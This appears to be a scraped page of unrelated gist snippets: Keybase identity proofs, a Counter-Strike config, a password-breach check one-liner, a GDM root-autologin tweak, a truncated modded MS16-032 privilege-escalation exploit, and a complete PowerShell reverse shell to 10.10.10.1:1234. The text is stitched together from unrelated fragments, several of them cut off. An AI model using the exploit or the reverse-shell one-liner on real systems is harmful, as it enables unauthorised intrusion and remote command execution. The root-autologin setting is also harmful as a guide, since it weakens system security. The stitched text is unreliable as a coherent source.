I hereby claim:
- I am dbaser on github.
- I am thales (https://keybase.io/thales) on keybase.
- I have a public key ASCG01CaC6pQKatyOZt6TafWJqM7BEwAMrKmE9TePW6k3wo
To claim this, I am signing this object:
### Keybase proof | |
I hereby claim: | |
* I am thalex on github. | |
* I am thales (https://keybase.io/thales) on keybase. | |
* I have a public key whose fingerprint is 22E4 0364 C7A5 50BE FE1C C6CD 525F 3513 9F05 AAEE | |
To claim this, I am signing this object: |
// ------------------------------------------------------------------------------- | |
// ----------------- GLOBAL ELITE CONFIG BY BossAmBlock -------------------------- | |
// ----------------- A COMPOSITION OF THE WORLDS BEST PLAYERS CONFIGS ------------ | |
// ------------------------------------------------------------------------------- | |
// ----------------- INDIVIDUAL SETTINGS CONFIG ---------------------------------- | |
// http://www.gamerconfig.eu/config/counter-strike-global-offensive/global+elite+config+by+bossamblock+updated+01062016,1787/#file0 // | |
bind "a" "+moveleft; ToggleTag" | |
bind "d" "+moveright; ToggleTag" | |
bind "s" "+back; ToggleTag" |
// ------------------------------------------------------------------------------- | |
// ----------------- GLOBAL ELITE CONFIG BY BossAmBlock -------------------------- | |
// ----------------- A COMPOSITION OF THE WORLDS BEST PLAYERS CONFIGS ------------ | |
// ------------------------------------------------------------------------------- | |
// ----------------- RESOLUTION: 1600x1200 (STRETCHED TO 16:9) ------------------- | |
// ----------------- WINDOWS MOUSE SETTINGS: 6/11 , 800 DPI ---------------------- | |
// ----------------- LAUNCH: -console -novid -high +exec autoexec ---------------- | |
// ------------------------------------------------------------------------------- | |
clear | |
// ------------------------------------------------------------------------------- |
## One-liner password leak check + k-anonymity method (w/out exposing the password on request) | |
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB! | |
# original source: https://news.ycombinator.com/item?id=16432344 | |
VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1` |
# Autologin | |
editar o arquivo -> /etc/gdm3/daemon.conf e descomentar as linhas abaixo: | |
AutomaticLoginEnable = true | |
AutomaticLogin = root |
I hereby claim:
To claim this, I am signing this object:
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv | |
# exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10" | |
# reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress 10.0.3.10 -Port 4567 | |
function Invoke-MS16-032 { | |
<# | |
.SYNOPSIS | |
PowerShell implementation of MS16-032. The exploit targets all vulnerable |
function Invoke-MS16-032 { | |
<# | |
.SYNOPSIS | |
PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
operating systems that support PowerShell v2+. Credit for the discovery of | |
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
Modifications by Mike Benich (@benichmt1). | |
Targets: |
$intrd = New-Object System.Net.Sockets.TCPClient("10.10.10.1",1234);$stream = $intrd.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$intrd.Close() |
find . -mindepth 1 -maxdepth 1 -type d -print -exec git -C {} pull \; |